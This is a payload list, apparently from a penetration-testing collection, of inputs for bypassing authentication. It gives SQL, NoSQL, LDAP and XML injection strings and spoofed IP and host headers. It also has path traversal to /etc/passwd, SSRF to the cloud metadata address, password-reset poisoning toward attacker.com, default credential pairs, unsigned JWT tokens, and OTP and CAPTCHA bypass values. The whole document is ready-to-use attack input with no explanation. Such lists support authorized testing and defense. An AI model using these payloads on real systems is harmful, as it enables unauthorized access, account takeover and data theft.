# Authentication Bypass Payloads

# SQL injection authentication bypass
admin' --
admin' #
admin'/*
' OR '1'='1' --
' OR 1=1--
admin' OR '1'='1
') OR ('1'='1
' OR 'x'='x
admin') OR ('1'='1'--

# NoSQL authentication bypass
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$in": ["admin", "administrator"]}, "password": {"$gt": ""}}

# JSON payload manipulation
{"username":"admin","password":"admin","role":"admin"}
{"username":"admin","password":"wrong","isAdmin":true}
{"username":"admin","is_authenticated":true}

# Session manipulation
PHPSESSID=admin
session_id=00000000-0000-0000-0000-000000000001
token=admin_token
auth=true

# Parameter pollution
username=attacker&username=admin
user=normal&user=admin

# Cookie manipulation
admin=true
isAdmin=1
role=admin
authenticated=true
user_level=admin

# Header injection
X-Forwarded-For: 127.0.0.1
X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Host: localhost
X-Forwarded-Host: localhost

# URL path manipulation
/admin/..;/
/admin/%2e%2e%3b/
/./admin/./
/admin;/
/admin..
//admin//
/./admin/./panel
/%2e/admin
/admin/~
/admin#
/admin?

# HTTP verb tampering
GET /admin
POST /admin
HEAD /admin
PUT /admin
DELETE /admin
OPTIONS /admin
TRACE /admin
PATCH /admin

# Case manipulation
/Admin
/ADMIN
/AdMiN
/aDmIn

# Unicode bypass
/admin%c0%af
/admin%e0%80%af
/admin%c0%ae%c0%ae/
/%61dmin

# Double encoding
/%252e%252e%252fadmin
/%252e%252e/admin

# Null byte injection
/admin%00
/admin%00.html
/admin%00.jpg

# Credential stuffing patterns
admin:admin
administrator:administrator
root:root
admin:password
admin:123456
admin:admin123
test:test
guest:guest
user:user
demo:demo

# Default credentials bypass
username=admin&password=
username=&password=
username=admin&password=%20
username=admin&password=*

# Password reset bypass
email=victim@example.com&email=attacker@example.com
token=&email=attacker@example.com
token=0
token=null
token=false
token=undefined
token=%20
token=true
email[]=victim@example.com&email[]=attacker@example.com
email=victim@example.com%0Acc:attacker@example.com
email=victim@example.com%0Abcc:attacker@example.com

# Password reset token manipulation
reset_token=' OR '1'='1
reset_token={"$gt": ""}
reset_token=*
reset_token=admin'--
user_id=1&token=valid_token
user_id=999&token=valid_token

# Host header injection for password reset poisoning
Host: attacker.com
X-Forwarded-Host: attacker.com
X-Host: attacker.com

# Password reset without verification
new_password=Pass123&confirm_password=Pass123
# (without providing reset token or current password)

# Password reset endpoint enumeration
POST /api/password/reset
POST /api/v1/auth/password-reset
POST /password-reset
POST /forgot-password
POST /reset-password
PUT /api/users/password
PATCH /account/password

# Weak token brute force
token=000000
token=111111
token=123456
token=0000
token=1234

# Bypass email verification in reset
email_verified=true
verified=true
skip_verification=true

# OTP/2FA bypass
otp=000000
otp=123456
otp=111111
otp=
otp=%20
otp=null

# Response manipulation
# Change HTTP response from 401/403 to 200
# Change "authenticated": false to "authenticated": true
# Change "role": "user" to "role": "admin"

# JWT manipulation (see JWT-Vulnerabilities for more)
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
Authorization: Bearer null
Authorization: Bearer 
Authorization: 

# GraphQL authentication bypass
{"query":"mutation{login(username:\"admin\",password:\"' OR '1'='1\"){token}}"}
{"query":"{users{id username password}}"}

# XML authentication bypass
<user><username>admin</username><password>' OR '1'='1</password></user>

# LDAP authentication bypass
username=*
username=admin)(|(password=*
username=*)(uid=*))(|(uid=*

# OAuth/OIDC bypass
redirect_uri=https://attacker.com
state=
nonce=
code=

# API key bypass
api_key=
X-API-Key: 
Authorization: 
apikey=null

# Session fixation
PHPSESSID=attacker_controlled_session
jsessionid=12345

# CAPTCHA bypass
captcha=
g-recaptcha-response=
h-captcha-response=
captcha_response=03AAYGu2...
recaptcha=

# Rate limiting bypass
X-Forwarded-For: random_ip_each_request
X-Originating-IP: random_ip_each_request
X-Remote-IP: random_ip_each_request

# Account enumeration
username=admin&password=wrong
username=nonexistent&password=wrong

# Login form variations
user[admin]=1
user[role]=admin
username[]=admin
password[]=anything

# Time-based bypass
wait_for_rate_limit=true
timestamp=future_date
valid_until=9999999999

# Magic hashes (PHP type juggling)
# 0e215962017 == 0 (PHP)
# 0e291242476940776845150308577824 == 0
password=0e215962017
password=240610708

# Unicode normalization
username=ⓐⓓⓜⓘⓝ
username=𝒶𝒹𝓂𝒾𝓃
username=ａｄｍｉｎ

# Homograph attack
username=αdmin (Greek alpha)
username=аdmin (Cyrillic а)

# Whitespace bypass
username= admin
username=admin 
username=%20admin
username=admin%20

# Special characters
username=admin'
username=admin"
username=admin`
username=admin\

# Email bypass for authentication
email=admin@localhost
email=admin@127.0.0.1
email=@example.com
email=victim@attacker.com

# Host header authentication bypass
Host: localhost
Host: 127.0.0.1
Host: internal.company.com

# Referer bypass
Referer: https://trusted-site.com
Referer: https://localhost

# Origin bypass
Origin: https://trusted-site.com
Origin: null

# Authentication via GET instead of POST
GET /api/login?username=admin&password=admin123

# File inclusion for authentication bypass
/etc/passwd
../../../../../../etc/passwd

# SSRF to bypass authentication
url=http://localhost/admin
url=http://127.0.0.1/admin
url=http://169.254.169.254/latest/meta-data/

# Request smuggling for authentication bypass
Content-Length: 0
Transfer-Encoding: chunked

# Race conditions
# Send multiple authentication requests simultaneously

# Business logic bypass
step=1&step=3
status=pending&status=approved
verified=false&verified=true

# Broken authentication chain
# Skip step 2 in multi-step authentication
# Reuse old session tokens
# Replay old authentication requests
